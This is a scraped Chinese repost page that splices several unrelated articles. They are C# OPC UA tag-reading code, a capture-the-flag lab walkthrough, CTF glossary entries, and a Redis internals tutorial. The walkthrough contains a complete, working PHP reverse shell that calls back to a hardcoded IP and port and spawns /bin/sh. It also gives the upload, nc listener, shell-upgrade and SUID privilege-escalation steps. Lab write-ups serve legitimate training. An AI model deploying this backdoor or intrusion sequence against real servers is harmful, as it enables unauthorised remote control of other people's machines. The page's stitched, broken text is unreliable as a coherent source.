}endregionregion 辅助方法/// <summary>/// 获取某个数据块标签的最小开始索引/// </summary>/// <param name="block">块号</param>/// <returns>返回数据块标签的最小开始索引</returns>private int GetExistsMinBeginByBlock(string block){int existsMinBegin = 99999; //已存在标签的最小开始索引int existsMaxEnd = 0; //已存在标签的最大结束索引bool isContinue = true; //标签值是否连续string[] existsTags = this.readResult.Keys.ToArray<string>();string[] beginend = null;bool parseResult = false;int begin = 0;int end = 0;foreach (string tag in existsTags){if (tag.StartsWith(String.Format("{0}{1}.", groupNamePrefix, block)) && tag.Contains(".") && tag.Contains("-")){string[] tagname = tag.Split(new char[] { '.' });if (tagname.Length == 2){beginend = tagname[1].Split(new char[] { '-' });if (beginend.Length == 2){parseResult = int.TryParse(beginend[0], out begin);if (parseResult){parseResult = int.TryParse(beginend[1], out end);}region 计算最小开始索引和最大结束索引if (begin < existsMinBegin){existsMinBegin = begin;region 判断标签值是否连续if (existsMaxEnd != 0 && begin != existsMaxEnd + 1){isContinue = false;}endregion}if (end > existsMaxEnd){existsMaxEnd = end;}endregion} }if (parseResult){//} }}return existsMinBegin;}/// <summary>/// 读取标签/// </summary>/// <param name="tagName"></param>private void ReadTag(string tagName){UInt16[] buff = null;if (this.dicTags.ContainsKey(tagName)){if (this.myOpcHelper.ReadUInt16(this.dicTags[tagName], out buff)){//Console.WriteLine("tagName={0}, buff length = {1}", tagName, buff.Length);if (this.readResult.ContainsKey(tagName)){this.readResult[tagName] = buff;}else{this.readResult.Add(tagName, buff);} }else{Console.WriteLine("Mesnac.Equip.OPC.OpcUa.OPCUA.Equip.ReadTag Exception 读取标签:[{0}]失败!", tagName);} }else{Console.WriteLine("Mesnac.Equip.OPC.OpcUa.OPCUA.Equip.ReadTag Exception OPCUA Server中未定义此标签:[{0}]!", tagName);} }/// <summary>/// 内部自动读取方法/// </summary>private void InnerAutoRead(){while (this._isOpen && this._isClosing == false){try{if (this.myOpcHelper == null){this._isClosing = true;this.State = false;return;}lock (this){string[] keys = this.readResult.Keys.ToArray<string>();foreach (string key in keys){this.ReadTag(key);} }System.Threading.Thread.Sleep(this.innerReadRate);}catch (Exception ex){Console.WriteLine("Mesnac.Equip.OPC.OpcUa.OPCUA.Equip.InnerAutoRead Exception : " + ex.Message);} }this.innerReadThread = null;}endregionregion 析构方法~Equip(){this.Close();}endregion} } 代码下载 代码下载 本篇文章为转载内容。原文链接:https://blog.csdn.net/zlbdmm/article/details/96714776。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-05-10 18:43:00
269
转载
转载文章
... in PHP// Copyright (C) 2007 pentestmonkey@pentestmonkey.net//// This tool may be used for legal purposes only. Users take full responsibility// for any actions performed using this tool. The author accepts no liability// for damage caused by this tool. If these terms are not acceptable to you, then// do not use this tool.//// In all other respects the GPL version 2 applies://// This program is free software; you can redistribute it and/or modify// it under the terms of the GNU General Public License version 2 as// published by the Free Software Foundation.//// This program is distributed in the hope that it will be useful,// but WITHOUT ANY WARRANTY; without even the implied warranty of// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the// GNU General Public License for more details.//// You should have received a copy of the GNU General Public License along// with this program; if not, write to the Free Software Foundation, Inc.,// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.//// This tool may be used for legal purposes only. Users take full responsibility// for any actions performed using this tool. If these terms are not acceptable to// you, then do not use this tool.//// You are encouraged to send comments, improvements or suggestions to// me at pentestmonkey@pentestmonkey.net//// Description// -----------// This script will make an outbound TCP connection to a hardcoded IP and port.// The recipient will be given a shell running as the current user (apache normally).//// Limitations// -----------// proc_open and stream_set_blocking require PHP version 4.3+, or 5+// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.//// Usage// -----// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.set_time_limit (0);$VERSION = "1.0";$ip = '192.168.184.128'; // CHANGE THIS$port = 6666; // CHANGE THIS$chunk_size = 1400;$write_a = null;$error_a = null;$shell = 'uname -a; w; id; /bin/sh -i';$daemon = 0;$debug = 0;//// Daemonise ourself if possible to avoid zombies later//// pcntl_fork is hardly ever available, but will allow us to daemonise// our php process and avoid zombies. Worth a try...if (function_exists('pcntl_fork')) {// Fork and have the parent process exit$pid = pcntl_fork();if ($pid == -1) {printit("ERROR: Can't fork");exit(1);}if ($pid) {exit(0); // Parent exits}// Make the current process a session leader// Will only succeed if we forkedif (posix_setsid() == -1) {printit("Error: Can't setsid()");exit(1);}$daemon = 1;} else {printit("WARNING: Failed to daemonise. This is quite common and not fatal.");}// Change to a safe directorychdir("/");// Remove any umask we inheritedumask(0);//// Do the reverse shell...//// Open reverse connection$sock = fsockopen($ip, $port, $errno, $errstr, 30);if (!$sock) {printit("$errstr ($errno)");exit(1);}// Spawn shell process$descriptorspec = array(0 => array("pipe", "r"), // stdin is a pipe that the child will read from1 => array("pipe", "w"), // stdout is a pipe that the child will write to2 => array("pipe", "w") // stderr is a pipe that the child will write to);$process = proc_open($shell, $descriptorspec, $pipes);if (!is_resource($process)) {printit("ERROR: Can't spawn shell");exit(1);}// Set everything to non-blocking// Reason: Occsionally reads will block, even though stream_select tells us they won'tstream_set_blocking($pipes[0], 0);stream_set_blocking($pipes[1], 0);stream_set_blocking($pipes[2], 0);stream_set_blocking($sock, 0);printit("Successfully opened reverse shell to $ip:$port");while (1) {// Check for end of TCP connectionif (feof($sock)) {printit("ERROR: Shell connection terminated");break;}// Check for end of STDOUTif (feof($pipes[1])) {printit("ERROR: Shell process terminated");break;}// Wait until a command is end down $sock, or some// command output is available on STDOUT or STDERR$read_a = array($sock, $pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);// If we can read from the TCP socket, send// data to process's STDINif (in_array($sock, $read_a)) {if ($debug) printit("SOCK READ");$input = fread($sock, $chunk_size);if ($debug) printit("SOCK: $input");fwrite($pipes[0], $input);}// If we can read from the process's STDOUT// send data down tcp connectionif (in_array($pipes[1], $read_a)) {if ($debug) printit("STDOUT READ");$input = fread($pipes[1], $chunk_size);if ($debug) printit("STDOUT: $input");fwrite($sock, $input);}// If we can read from the process's STDERR// send data down tcp connectionif (in_array($pipes[2], $read_a)) {if ($debug) printit("STDERR READ");$input = fread($pipes[2], $chunk_size);if ($debug) printit("STDERR: $input");fwrite($sock, $input);} }fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);// Like print, but does nothing if we've daemonised ourself// (I can't figure out how to redirect STDOUT like a proper daemon)function printit ($string) {if (!$daemon) {print "$string\n";} }?> [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RhgS5l2a-1650016495549)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220110173559344.png)] 上传该文件 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-CKEldpll-1650016495549)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220110173801442.png)] 在 kali 监听:nc -lvp 6666 访问后门文件:http://192.168.184.149/php-reverse-shell.php 不成功 尝试加上传文件夹:http://192.168.184.149/uploads/php-reverse-shell.php 成功访问 使用 python 切换为 bash:python3 -c 'import pty; pty.spawn("/bin/bash")' 2.4权限提升 2.4.1 SUID 提权 sudo -l不顶用了,换个方法 查询 suid 权限程序: find / -perm -u=s -type f 2>/dev/null www-data@hackme:/$ find / -perm -u=s -type f 2>/dev/nullfind / -perm -u=s -type f 2>/dev/null/snap/core20/1270/usr/bin/chfn/snap/core20/1270/usr/bin/chsh/snap/core20/1270/usr/bin/gpasswd/snap/core20/1270/usr/bin/mount/snap/core20/1270/usr/bin/newgrp/snap/core20/1270/usr/bin/passwd/snap/core20/1270/usr/bin/su/snap/core20/1270/usr/bin/sudo/snap/core20/1270/usr/bin/umount/snap/core20/1270/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core20/1270/usr/lib/openssh/ssh-keysign/snap/core/6531/bin/mount/snap/core/6531/bin/ping/snap/core/6531/bin/ping6/snap/core/6531/bin/su/snap/core/6531/bin/umount/snap/core/6531/usr/bin/chfn/snap/core/6531/usr/bin/chsh/snap/core/6531/usr/bin/gpasswd/snap/core/6531/usr/bin/newgrp/snap/core/6531/usr/bin/passwd/snap/core/6531/usr/bin/sudo/snap/core/6531/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core/6531/usr/lib/openssh/ssh-keysign/snap/core/6531/usr/lib/snapd/snap-confine/snap/core/6531/usr/sbin/pppd/snap/core/5662/bin/mount/snap/core/5662/bin/ping/snap/core/5662/bin/ping6/snap/core/5662/bin/su/snap/core/5662/bin/umount/snap/core/5662/usr/bin/chfn/snap/core/5662/usr/bin/chsh/snap/core/5662/usr/bin/gpasswd/snap/core/5662/usr/bin/newgrp/snap/core/5662/usr/bin/passwd/snap/core/5662/usr/bin/sudo/snap/core/5662/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core/5662/usr/lib/openssh/ssh-keysign/snap/core/5662/usr/lib/snapd/snap-confine/snap/core/5662/usr/sbin/pppd/snap/core/11993/bin/mount/snap/core/11993/bin/ping/snap/core/11993/bin/ping6/snap/core/11993/bin/su/snap/core/11993/bin/umount/snap/core/11993/usr/bin/chfn/snap/core/11993/usr/bin/chsh/snap/core/11993/usr/bin/gpasswd/snap/core/11993/usr/bin/newgrp/snap/core/11993/usr/bin/passwd/snap/core/11993/usr/bin/sudo/snap/core/11993/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core/11993/usr/lib/openssh/ssh-keysign/snap/core/11993/usr/lib/snapd/snap-confine/snap/core/11993/usr/sbin/pppd/usr/lib/eject/dmcrypt-get-device/usr/lib/openssh/ssh-keysign/usr/lib/snapd/snap-confine/usr/lib/policykit-1/polkit-agent-helper-1/usr/lib/dbus-1.0/dbus-daemon-launch-helper/usr/bin/pkexec/usr/bin/traceroute6.iputils/usr/bin/passwd/usr/bin/chsh/usr/bin/chfn/usr/bin/gpasswd/usr/bin/at/usr/bin/newgrp/usr/bin/sudo/home/legacy/touchmenot/bin/mount/bin/umount/bin/ping/bin/ntfs-3g/bin/su/bin/fusermount 发现一个可疑文件/home/legacy/touchmenot 在 https://gtfobins.github.io/网站上查询:touchmenot 没找到 尝试运行程序:发现直接提权成功 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qcpXI6zZ-1650016495551)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220110174530827.png)] 找半天没找到flag的文件 what?就这? 总结 本节使用的工具和漏洞比较基础,涉及 SQL 注入漏洞和文件上传漏洞 sql 注入工具:sqlmap 抓包工具:burpsuite Webshell 后门:kali 内置后门 Suid 提权:touchmenot 提权 本篇文章为转载内容。原文链接:https://blog.csdn.net/Perpetual_Blue/article/details/124200651。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-01-02 12:50:54
497
转载
转载文章
...常规的SELECT、UPDATE或DELETE等SQL语句。在该文描述的GYCTF2020比赛中,由于存在严格的过滤规则,参赛者无法直接用常规SQL查询获取数据,因此他们借助handler语句逐行读取表内容,成功破解了题目并得到了flag。 PHP函数CVE-2020-7066 , 这是一个公开的安全漏洞编号,对应PHP 7.2.x、7.3.x以及7.4.x版本中的get_headers()函数存在的安全问题。在特定条件下,当get_headers()函数处理包含零字节(\\0)的URL时,URL会被错误地截断,可能导致信息泄露。在GKCTF2020比赛的签到题目中,选手需要根据这个CVE提示,研究如何构造特定URL,并利用get_headers()函数的这一漏洞,实现信息泄露,进而完成签到或获取flag的操作。
2023-11-13 21:30:33
303
转载
转载文章
... script already executed write commands against the dataset. You can either wait the scripttermination or kill the server in a hard way using the SHUTDOWN NOSAVE command. 遇到这种情况,只能通过 shutdown nosave 命令来强行终止 redis。 shutdown nosave 和 shutdown 的区别在于 shutdown nosave 不会进行持久化操作,意味着发生在上一次快照后的数据库修改都会丢失。 4、Redis 为什么这么快? 4.1 Redis到底有多快? 根据官方的数据,Redis 的 QPS 可以达到 10 万左右(每秒请求数)。 4.2 Redis为什么这么快? 总结:1)纯内存结构、2)单线程、3)多路复用 4.2.1 内存 KV 结构的内存数据库,时间复杂度 O(1)。 第二个,要实现这么高的并发性能,是不是要创建非常多的线程? 恰恰相反,Redis 是单线程的。 4.2.2 单线程 单线程有什么好处呢? 1、没有创建线程、销毁线程带来的消耗 2、避免了上线文切换导致的 CPU 消耗 3、避免了线程之间带来的竞争问题,例如加锁释放锁死锁等等 4.2.3 异步非阻塞 异步非阻塞 I/O,多路复用处理并发连接。 4.3 Redis为什么是单线程的? 不是白白浪费了 CPU 的资源吗? 因为单线程已经够用了,CPU 不是 redis 的瓶颈。Redis 的瓶颈最有可能是机器内存或者网络带宽。既然单线程容易实现,而且 CPU 不会成为瓶颈,那就顺理成章地采用单线程的方案了。 4.4 单线程为什么这么快? 因为 Redis 是基于内存的操作,我们先从内存开始说起。 4.4.1 虚拟存储器(虚拟内存 Vitual Memory) 名词解释:主存:内存;辅存:磁盘(硬盘) 计算机主存(内存)可看作一个由 M 个连续的字节大小的单元组成的数组,每个字节有一个唯一的地址,这个地址叫做物理地址(PA)。早期的计算机中,如果 CPU 需要内存,使用物理寻址,直接访问主存储器。 这种方式有几个弊端: 1、在多用户多任务操作系统中,所有的进程共享主存,如果每个进程都独占一块物理地址空间,主存很快就会被用完。我们希望在不同的时刻,不同的进程可以共用同一块物理地址空间。 2、如果所有进程都是直接访问物理内存,那么一个进程就可以修改其他进程的内存数据,导致物理地址空间被破坏,程序运行就会出现异常。 为了解决这些问题,我们就想了一个办法,在 CPU 和主存之间增加一个中间层。CPU 不再使用物理地址访问,而是访问一个虚拟地址,由这个中间层把地址转换成物理地址,最终获得数据。这个中间层就叫做虚拟存储器(Virtual Memory)。 具体的操作如下所示: 在每一个进程开始创建的时候,都会分配一段虚拟地址,然后通过虚拟地址和物理地址的映射来获取真实数据,这样进程就不会直接接触到物理地址,甚至不知道自己调用的哪块物理地址的数据。 目前,大多数操作系统都使用了虚拟内存,如 Windows 系统的虚拟内存、Linux 系统的交换空间等等。Windows 的虚拟内存(pagefile.sys)是磁盘空间的一部分。 在 32 位的系统上,虚拟地址空间大小是 2^32bit=4G。在 64 位系统上,最大虚拟地址空间大小是多少? 是不是 2^64bit=10241014TB=1024PB=16EB?实际上没有用到 64 位,因为用不到这么大的空间,而且会造成很大的系统开销。Linux 一般用低 48 位来表示虚拟地址空间,也就是 2^48bit=256T。 cat /proc/cpuinfo address sizes : 40 bits physical, 48 bits virtual 实际的物理内存可能远远小于虚拟内存的大小。 总结:引入虚拟内存,可以提供更大的地址空间,并且地址空间是连续的,使得程序编写、链接更加简单。并且可以对物理内存进行隔离,不同的进程操作互不影响。还可以通过把同一块物理内存映射到不同的虚拟地址空间实现内存共享。 4.4.2 用户空间和内核空间 为了避免用户进程直接操作内核,保证内核安全,操作系统将虚拟内存划分为两部分,一部分是内核空间(Kernel-space)/ˈkɜːnl /,一部分是用户空间(User-space)。 内核是操作系统的核心,独立于普通的应用程序,可以访问受保护的内存空间,也有访问底层硬件设备的权限。 内核空间中存放的是内核代码和数据,而进程的用户空间中存放的是用户程序的代码和数据。不管是内核空间还是用户空间,它们都处于虚拟空间中,都是对物理地址的映射。 在 Linux 系统中, 内核进程和用户进程所占的虚拟内存比例是 1:3。 当进程运行在内核空间时就处于内核态,而进程运行在用户空间时则处于用户态。 进程在内核空间以执行任意命令,调用系统的一切资源;在用户空间只能执行简单的运算,不能直接调用系统资源,必须通过系统接口(又称 system call),才能向内核发出指令。 top 命令: us 代表 CPU 消耗在 User space 的时间百分比; sy 代表 CPU 消耗在 Kernel space 的时间百分比。 4.4.3 进程切换(上下文切换) 多任务操作系统是怎么实现运行远大于 CPU 数量的任务个数的? 当然,这些任务实际上并不是真的在同时运行,而是因为系统通过时间片分片算法,在很短的时间内,将 CPU 轮流分配给它们,造成多任务同时运行的错觉。 为了控制进程的执行,内核必须有能力挂起正在 CPU 上运行的进程,并恢复以前挂起的某个进程的执行。这种行为被称为进程切换。 什么叫上下文? 在每个任务运行前,CPU 都需要知道任务从哪里加载、又从哪里开始运行,也就是说,需要系统事先帮它设置好 CPU 寄存器和程序计数器(ProgramCounter),这个叫做 CPU 的上下文。 而这些保存下来的上下文,会存储在系统内核中,并在任务重新调度执行时再次加载进来。这样就能保证任务原来的状态不受影响,让任务看起来还是连续运行。 在切换上下文的时候,需要完成一系列的工作,这是一个很消耗资源的操作。 4.4.4 进程的阻塞 正在运行的进程由于提出系统服务请求(如 I/O 操作),但因为某种原因未得到操作系统的立即响应,该进程只能把自己变成阻塞状态,等待相应的事件出现后才被唤醒。 进程在阻塞状态不占用 CPU 资源。 4.4.5 文件描述符 FD Linux 系统将所有设备都当作文件来处理,而 Linux 用文件描述符来标识每个文件对象。 文件描述符(File Descriptor)是内核为了高效管理已被打开的文件所创建的索引,用于指向被打开的文件,所有执行 I/O 操作的系统调用都通过文件描述符;文件描述符是一个简单的非负整数,用以表明每个被进程打开的文件。 Linux 系统里面有三个标准文件描述符。 0:标准输入(键盘); 1:标准输出(显示器); 2:标准错误输出(显示器)。 4.4.6 传统 I/O 数据拷贝 以读操作为例: 当应用程序执行 read 系统调用读取文件描述符(FD)的时候,如果这块数据已经存在于用户进程的页内存中,就直接从内存中读取数据。如果数据不存在,则先将数据从磁盘加载数据到内核缓冲区中,再从内核缓冲区拷贝到用户进程的页内存中。(两次拷贝,两次 user 和 kernel 的上下文切换)。 I/O 的阻塞到底阻塞在哪里? 4.4.7 Blocking I/O 当使用 read 或 write 对某个文件描述符进行过读写时,如果当前 FD 不可读,系统就不会对其他的操作做出响应。从设备复制数据到内核缓冲区是阻塞的,从内核缓冲区拷贝到用户空间,也是阻塞的,直到 copy complete,内核返回结果,用户进程才解除 block 的状态。 为了解决阻塞的问题,我们有几个思路。 1、在服务端创建多个线程或者使用线程池,但是在高并发的情况下需要的线程会很多,系统无法承受,而且创建和释放线程都需要消耗资源。 2、由请求方定期轮询,在数据准备完毕后再从内核缓存缓冲区复制数据到用户空间 (非阻塞式 I/O),这种方式会存在一定的延迟。 能不能用一个线程处理多个客户端请求? 4.4.8 I/O 多路复用(I/O Multiplexing) I/O 指的是网络 I/O。 多路指的是多个 TCP 连接(Socket 或 Channel)。 复用指的是复用一个或多个线程。它的基本原理就是不再由应用程序自己监视连接,而是由内核替应用程序监视文件描述符。 客户端在操作的时候,会产生具有不同事件类型的 socket。在服务端,I/O 多路复用程序(I/O Multiplexing Module)会把消息放入队列中,然后通过文件事件分派器(File event Dispatcher),转发到不同的事件处理器中。 多路复用有很多的实现,以 select 为例,当用户进程调用了多路复用器,进程会被阻塞。内核会监视多路复用器负责的所有 socket,当任何一个 socket 的数据准备好了,多路复用器就会返回。这时候用户进程再调用 read 操作,把数据从内核缓冲区拷贝到用户空间。 所以,I/O 多路复用的特点是通过一种机制一个进程能同时等待多个文件描述符,而这些文件描述符(套接字描述符)其中的任意一个进入读就绪(readable)状态,select() 函数就可以返回。 Redis 的多路复用, 提供了 select, epoll, evport, kqueue 几种选择,在编译的时 候来选择一种。 evport 是 Solaris 系统内核提供支持的; epoll 是 LINUX 系统内核提供支持的; kqueue 是 Mac 系统提供支持的; select 是 POSIX 提供的,一般的操作系统都有支撑(保底方案); 源码 ae_epoll.c、ae_select.c、ae_kqueue.c、ae_evport.c 5、内存回收 Reids 所有的数据都是存储在内存中的,在某些情况下需要对占用的内存空间进行回 收。内存回收主要分为两类,一类是 key 过期,一类是内存使用达到上限(max_memory) 触发内存淘汰。 5.1 过期策略 要实现 key 过期,我们有几种思路。 5.1.1 定时过期(主动淘汰) 每个设置过期时间的 key 都需要创建一个定时器,到过期时间就会立即清除。该策略可以立即清除过期的数据,对内存很友好;但是会占用大量的 CPU 资源去处理过期的 数据,从而影响缓存的响应时间和吞吐量。 5.1.2 惰性过期(被动淘汰) 只有当访问一个 key 时,才会判断该 key 是否已过期,过期则清除。该策略可以最大化地节省 CPU 资源,却对内存非常不友好。极端情况可能出现大量的过期 key 没有再次被访问,从而不会被清除,占用大量内存。 例如 String,在 getCommand 里面会调用 expireIfNeeded server.c expireIfNeeded(redisDb db, robj key) 第二种情况,每次写入 key 时,发现内存不够,调用 activeExpireCycle 释放一部分内存。 expire.c activeExpireCycle(int type) 5.1.3 定期过期 源码:server.h typedef struct redisDb { dict dict; / 所有的键值对 /dict expires; / 设置了过期时间的键值对 /dict blocking_keys; dict ready_keys; dict watched_keys; int id;long long avg_ttl;list defrag_later; } redisDb; 每隔一定的时间,会扫描一定数量的数据库的 expires 字典中一定数量的 key,并清除其中已过期的 key。该策略是前两者的一个折中方案。通过调整定时扫描的时间间隔和每次扫描的限定耗时,可以在不同情况下使得 CPU 和内存资源达到最优的平衡效果。 Redis 中同时使用了惰性过期和定期过期两种过期策略。 5.2 淘汰策略 Redis 的内存淘汰策略,是指当内存使用达到最大内存极限时,需要使用淘汰算法来决定清理掉哪些数据,以保证新数据的存入。 5.2.1 最大内存设置 redis.conf 参数配置: maxmemory <bytes> 如果不设置 maxmemory 或者设置为 0,64 位系统不限制内存,32 位系统最多使用 3GB 内存。 动态修改: redis> config set maxmemory 2GB 到达最大内存以后怎么办? 5.2.2 淘汰策略 https://redis.io/topics/lru-cache redis.conf maxmemory-policy noeviction 先从算法来看: LRU,Least Recently Used:最近最少使用。判断最近被使用的时间,目前最远的数据优先被淘汰。 LFU,Least Frequently Used,最不常用,4.0 版本新增。 random,随机删除。 如果没有符合前提条件的 key 被淘汰,那么 volatile-lru、volatile-random、 volatile-ttl 相当于 noeviction(不做内存回收)。 动态修改淘汰策略: redis> config set maxmemory-policy volatile-lru 建议使用 volatile-lru,在保证正常服务的情况下,优先删除最近最少使用的 key。 5.2.3 LRU 淘汰原理 问题:如果基于传统 LRU 算法实现 Redis LRU 会有什么问题? 需要额外的数据结构存储,消耗内存。 Redis LRU 对传统的 LRU 算法进行了改良,通过随机采样来调整算法的精度。如果淘汰策略是 LRU,则根据配置的采样值 maxmemory_samples(默认是 5 个), 随机从数据库中选择 m 个 key, 淘汰其中热度最低的 key 对应的缓存数据。所以采样参数m配置的数值越大, 就越能精确的查找到待淘汰的缓存数据,但是也消耗更多的CPU计算,执行效率降低。 问题:如何找出热度最低的数据? Redis 中所有对象结构都有一个 lru 字段, 且使用了 unsigned 的低 24 位,这个字段用来记录对象的热度。对象被创建时会记录 lru 值。在被访问的时候也会更新 lru 的值。 但是不是获取系统当前的时间戳,而是设置为全局变量 server.lruclock 的值。 源码:server.h typedef struct redisObject {unsigned type:4;unsigned encoding:4;unsigned lru:LRU_BITS;int refcount;void ptr; } robj; server.lruclock 的值怎么来的? Redis 中有个定时处理的函数 serverCron,默认每 100 毫秒调用函数 updateCachedTime 更新一次全局变量的 server.lruclock 的值,它记录的是当前 unix 时间戳。 源码:server.c void updateCachedTime(void) { time_t unixtime = time(NULL); atomicSet(server.unixtime,unixtime); server.mstime = mstime();struct tm tm; localtime_r(&server.unixtime,&tm);server.daylight_active = tm.tm_isdst; } 问题:为什么不获取精确的时间而是放在全局变量中?不会有延迟的问题吗? 这样函数 lookupKey 中更新数据的 lru 热度值时,就不用每次调用系统函数 time,可以提高执行效率。 OK,当对象里面已经有了 LRU 字段的值,就可以评估对象的热度了。 函数 estimateObjectIdleTime 评估指定对象的 lru 热度,思想就是对象的 lru 值和全局的 server.lruclock 的差值越大(越久没有得到更新),该对象热度越低。 源码 evict.c / Given an object returns the min number of milliseconds the object was never requested, using an approximated LRU algorithm. /unsigned long long estimateObjectIdleTime(robj o) {unsigned long long lruclock = LRU_CLOCK(); if (lruclock >= o->lru) {return (lruclock - o->lru) LRU_CLOCK_RESOLUTION; } else {return (lruclock + (LRU_CLOCK_MAX - o->lru)) LRU_CLOCK_RESOLUTION;} } server.lruclock 只有 24 位,按秒为单位来表示才能存储 194 天。当超过 24bit 能表 示的最大时间的时候,它会从头开始计算。 server.h define LRU_CLOCK_MAX ((1<<LRU_BITS)-1) / Max value of obj->lru / 在这种情况下,可能会出现对象的 lru 大于 server.lruclock 的情况,如果这种情况 出现那么就两个相加而不是相减来求最久的 key。 为什么不用常规的哈希表+双向链表的方式实现?需要额外的数据结构,消耗资源。而 Redis LRU 算法在 sample 为 10 的情况下,已经能接近传统 LRU 算法了。 问题:除了消耗资源之外,传统 LRU 还有什么问题? 如图,假设 A 在 10 秒内被访问了 5 次,而 B 在 10 秒内被访问了 3 次。因为 B 最后一次被访问的时间比 A 要晚,在同等的情况下,A 反而先被回收。 问题:要实现基于访问频率的淘汰机制,怎么做? 5.2.4 LFU server.h typedef struct redisObject {unsigned type:4;unsigned encoding:4;unsigned lru:LRU_BITS;int refcount;void ptr; } robj; 当这 24 bits 用作 LFU 时,其被分为两部分: 高 16 位用来记录访问时间(单位为分钟,ldt,last decrement time) 低 8 位用来记录访问频率,简称 counter(logc,logistic counter) counter 是用基于概率的对数计数器实现的,8 位可以表示百万次的访问频率。 对象被读写的时候,lfu 的值会被更新。 db.c——lookupKey void updateLFU(robj val) {unsigned long counter = LFUDecrAndReturn(val); counter = LFULogIncr(counter);val->lru = (LFUGetTimeInMinutes()<<8) | counter;} 增长的速率由,lfu-log-factor 越大,counter 增长的越慢 redis.conf 配置文件。 lfu-log-factor 10 如果计数器只会递增不会递减,也不能体现对象的热度。没有被访问的时候,计数器怎么递减呢? 减少的值由衰减因子 lfu-decay-time(分钟)来控制,如果值是 1 的话,N 分钟没有访问就要减少 N。 redis.conf 配置文件 lfu-decay-time 1 6、持久化机制 https://redis.io/topics/persistence Redis 速度快,很大一部分原因是因为它所有的数据都存储在内存中。如果断电或者宕机,都会导致内存中的数据丢失。为了实现重启后数据不丢失,Redis 提供了两种持久化的方案,一种是 RDB 快照(Redis DataBase),一种是 AOF(Append Only File)。 6.1 RDB RDB 是 Redis 默认的持久化方案。当满足一定条件的时候,会把当前内存中的数据写入磁盘,生成一个快照文件 dump.rdb。Redis 重启会通过加载 dump.rdb 文件恢复数据。 什么时候写入 rdb 文件? 6.1.1 RDB 触发 1、自动触发 a)配置规则触发。 redis.conf, SNAPSHOTTING,其中定义了触发把数据保存到磁盘的触发频率。 如果不需要 RDB 方案,注释 save 或者配置成空字符串""。 save 900 1 900 秒内至少有一个 key 被修改(包括添加) save 300 10 400 秒内至少有 10 个 key 被修改save 60 10000 60 秒内至少有 10000 个 key 被修改 注意上面的配置是不冲突的,只要满足任意一个都会触发。 RDB 文件位置和目录: 文件路径,dir ./ 文件名称dbfilename dump.rdb 是否是LZF压缩rdb文件 rdbcompression yes 开启数据校验 rdbchecksum yes 问题:为什么停止 Redis 服务的时候没有 save,重启数据还在? RDB 还有两种触发方式: b)shutdown 触发,保证服务器正常关闭。 c)flushall,RDB 文件是空的,没什么意义(删掉 dump.rdb 演示一下)。 2、手动触发 如果我们需要重启服务或者迁移数据,这个时候就需要手动触 RDB 快照保存。Redis 提供了两条命令: a)save save 在生成快照的时候会阻塞当前 Redis 服务器, Redis 不能处理其他命令。如果内存中的数据比较多,会造成 Redis 长时间的阻塞。生产环境不建议使用这个命令。 为了解决这个问题,Redis 提供了第二种方式。 执行 bgsave 时,Redis 会在后台异步进行快照操作,快照同时还可以响应客户端请求。 具体操作是 Redis 进程执行 fork 操作创建子进程(copy-on-write),RDB 持久化过程由子进程负责,完成后自动结束。它不会记录 fork 之后后续的命令。阻塞只发生在 fork 阶段,一般时间很短。 用 lastsave 命令可以查看最近一次成功生成快照的时间。 6.1.2 RDB 数据的恢复(演示) 1、shutdown 持久化添加键值 添加键值 redis> set k1 1 redis> set k2 2 redis> set k3 3 redis> set k4 4 redis> set k5 5 停服务器,触发 save redis> shutdown 备份 dump.rdb 文件 cp dump.rdb dump.rdb.bak 启动服务器 /usr/local/soft/redis-5.0.5/src/redis-server /usr/local/soft/redis-5.0.5/redis.conf 啥都没有: redis> keys 3、通过备份文件恢复数据停服务器 redis> shutdown 重命名备份文件 mv dump.rdb.bak dump.rdb 启动服务器 /usr/local/soft/redis-5.0.5/src/redis-server /usr/local/soft/redis-5.0.5/redis.conf 查看数据 redis> keys 6.1.3 RDB 文件的优势和劣势 一、优势 1.RDB 是一个非常紧凑(compact)的文件,它保存了 redis 在某个时间点上的数据集。这种文件非常适合用于进行备份和灾难恢复。 2.生成 RDB 文件的时候,redis 主进程会 fork()一个子进程来处理所有保存工作,主进程不需要进行任何磁盘 IO 操作。 3.RDB 在恢复大数据集时的速度比 AOF 的恢复速度要快。 二、劣势 1、RDB 方式数据没办法做到实时持久化/秒级持久化。因为 bgsave 每次运行都要执行 fork 操作创建子进程,频繁执行成本过高。 2、在一定间隔时间做一次备份,所以如果 redis 意外 down 掉的话,就会丢失最后一次快照之后的所有修改(数据有丢失)。 如果数据相对来说比较重要,希望将损失降到最小,则可以使用 AOF 方式进行持久化。 6.2 AOF Append Only File AOF:Redis 默认不开启。AOF 采用日志的形式来记录每个写操作,并追加到文件中。开启后,执行更改 Redis 数据的命令时,就会把命令写入到 AOF 文件中。 Redis 重启时会根据日志文件的内容把写指令从前到后执行一次以完成数据的恢复工作。 6.2.1 AOF 配置 配置文件 redis.conf 开关appendonly no 文件名appendfilename "appendonly.aof" AOF 文件的内容(vim 查看): 